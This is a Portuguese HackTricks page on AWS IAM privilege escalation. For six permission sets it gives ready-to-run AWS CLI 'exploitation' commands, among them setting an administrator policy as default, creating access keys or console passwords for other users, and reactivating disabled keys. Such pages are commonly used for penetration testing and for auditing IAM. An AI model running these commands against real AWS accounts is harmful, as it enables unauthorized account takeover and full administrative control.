AWS - IAM Privesc

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Verifique os PLANOS DE ASSINATURA!
Adquira o swag oficial PEASS & HackTricks
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.

IAM

Para mais informações sobre IAM, verifique:

pageAWS - IAM, Identity Center & SSO Enum

`iam:CreatePolicyVersion`

Concede a capacidade de criar uma nova versão de política IAM, contornando a necessidade de permissão iam:SetDefaultPolicyVersion usando a flag --set-as-default. Isso permite definir permissões personalizadas.

Comando de Exploração:

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Impact: Escala diretamente os privilégios, permitindo qualquer ação em qualquer recurso.

`iam:SetDefaultPolicyVersion`

Permite alterar a versão padrão de uma política IAM para outra versão existente, potencialmente escalando privilégios se a nova versão tiver mais permissões.

Comando Bash:

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Impacto: Escalação de privilégios indireta ao habilitar mais permissões.

`iam:CreateAccessKey`

Permite a criação de um ID de chave de acesso e chave de acesso secreta para outro usuário, levando a uma possível escalada de privilégios.

Exploração:

aws iam create-access-key --user-name <target_user>

Impacto: Escalação direta de privilégios ao assumir as permissões estendidas de outro usuário.

`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`

Permite criar ou atualizar um perfil de login, incluindo a definição de senhas para o login no console da AWS, levando a uma escalada direta de privilégios.

Exploração para Criação:

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Exploração para Atualização:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Impacto: Escalação de privilégios direta ao fazer login como "qualquer" usuário.

`iam:UpdateAccessKey`

Permite habilitar uma chave de acesso desativada, potencialmente levando a acesso não autorizado se o atacante possuir a chave desativada.

Exploração:

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Impacto: Escalação direta de privilégios ao reativar chaves de acesso.

`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`

Permite gerar ou redefinir credenciais para serviços específicos da AWS (por exemplo, CodeCommit, Amazon Keyspaces), herdando as permissões do usuário associado.

Exploração para Criação:

aws iam create-service-specific-credential --user-name <username> --service-name <service>

Referências

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Aprenda hacking na AWS de zero a herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, verifique os PLANOS DE ASSINATURA!
Adquira o swag oficial do PEASS & HackTricks
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe seus truques de hacking enviando PRs para os repositórios HackTricks e HackTricks Cloud.

AnteriorAWS - Glue Privesc SiguienteAWS - KMS Privesc

Última actualización hace 3 meses

IAM

iam:CreatePolicyVersion

iam:SetDefaultPolicyVersion

iam:CreateAccessKey

iam:CreateLoginProfile | iam:UpdateLoginProfile

iam:UpdateAccessKey

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential